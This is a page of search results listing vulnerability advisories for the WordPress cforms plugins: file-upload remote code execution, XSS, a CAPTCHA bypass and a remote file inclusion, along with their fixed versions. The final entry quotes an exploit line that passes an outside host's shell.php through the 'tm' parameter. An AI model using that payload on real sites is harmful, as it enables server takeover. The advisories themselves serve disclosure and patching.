41 matches found
Wordpress Plugin Cforms 14.7 Remote Code Execution Vulnerability
Cforms version 14.7 suffers from a remote code execution vulnerability. Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Author: Zakhar Fedotkin Affected Software: Wordpress Plugin Cforms II 14.x-14.7 Release: 12th Nov 2014 Vendor URL:...
Cforms & CformsII <= 14.7 - Remote Code Execution via Unauthorised File Upload
...
Cforms 14.7 Remote Code Execution
Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Advisory ID: - Author: Zakhar Fedotkin Affected Software: Wordpress Plugin Cforms II 14.x-14.7 Release: 12th Nov 2014 Vendor URL: https://wordpress.org/plugins/cforms2/ Vendor Status: fixed CVE-ID: -...
Cforms < 13.2 - XSS
The cforms WordPress plugin was affected by a XSS security vulnerability...
Cforms < 10.2 - XSS
The cforms WordPress plugin was affected by a XSS security vulnerability...
Cforms < 10.5 - XSS
The cforms WordPress plugin was affected by a XSS security vulnerability...
cforms II vulnerable to cross-site scripting
Overview cforms II contains a cross-site scripting vulnerability. cforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. Kousuke Ebihara and Yuya Watanabe of Tejimaya.inc reported this vulnerability to IPA. JPCERT/CC coordinated wi...
JVN#35256978: cforms II vulnerable to cross-site scripting
cforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. Impact An arbitrary script may be executed on the user's web browser. Solution Update the Software Update to the latest version according to the information provided by the...
Cforms & CformsII <= 14.10.1 - CAPTCHA Bypass
The cformsII plugin slug: cforms and its fork slug: cforms2 have a CAPTCHA Bypass vulnerability. The MD5 hash for matching the answer is sent with the forms and so it can be overwritten. This is fixed in the fork cforms2 with version 14.11 see changelog for confirmation. The original delicious:da...
Preemptive Protection against WordPress cforms Plugin Cross-Site Scripting (XSS) Vulnerability
A cross-site scripting XSS vulnerability has been reported in the cforms plugin for WordPress. cforms is a highly customizable, flexible and powerful form builder plugin, covering a variety of use cases and features from attachments to multi-form management. A remote attacker may exploit this...
CVE-2010-3977
Multiple cross-site scripting XSS vulnerabilities in wp-content/plugins/cforms/libajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the 1 rs and 2 rsargs parameters...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in wp-content/plugins/cforms/libajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the 1 rs and 2 rsargs parameters...
CVE-2010-3977
CVE-2010-3977 affects the WordPress plugin cforms (version 11.5) via the file wp-content/plugins/cforms/lib_ajax.php . The root cause is improper validation/sanitation of user-supplied input in the rs and rsargs[] parameters, enabling remote attackers to inject arbitrary HTML/JavaScript (XSS) int...
cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977
Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team VDT http://www.checkpoint.com/defense/ cforms WordPress Plugin Cross Site Scripting Vulnerability CVE-2010-3977...
Cforms <= 13.1 - 'lib_ajax.php' Cross-Site Scripting (XSS)
The cforms plugin has a XSS vulnerability in file libajax.php with rs and rsargs parameters. It is fixed in version 13.2. The cforms2 fork was forked at 14.6, so it is not affected...
Remote file inclusion
PHP remote file inclusion vulnerability in cforms-css.php in Oliver Seidel cforms contactforms, a Wordpress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter. NOTE: CVE disputes this issue for 7.3, since there is no tm parameter, and the code exits with a...
CVE-2008-0560
CVE-2008-0560 affects the WordPress plugin cforms (Oliver Seidel cforms, also known as contactforms). The vulnerability is in cforms-css.php and allows remote attackers to execute arbitrary PHP code via a URL parameter tm, due to a PHP remote file inclusion. Several sources note that version 7.3 ...
PT-2008-2186 · Oliver Seidel · Cforms
Name of the Vulnerable Software and Affected Versions: cforms contactforms versions prior to 7.3 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter in the cforms-css.php file. This is a PHP remote file inclusion vulnerability in the Oliver...
WordPress Contact Form Plugin <= 7.3 - Remote File Inclusion
Because of this vulnerability in cforms-css.php, the attackers can execute arbitrary PHP code via a URL in the "tm" parameter. Solution Update the plugin...
contactforms-rfi.txt
Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...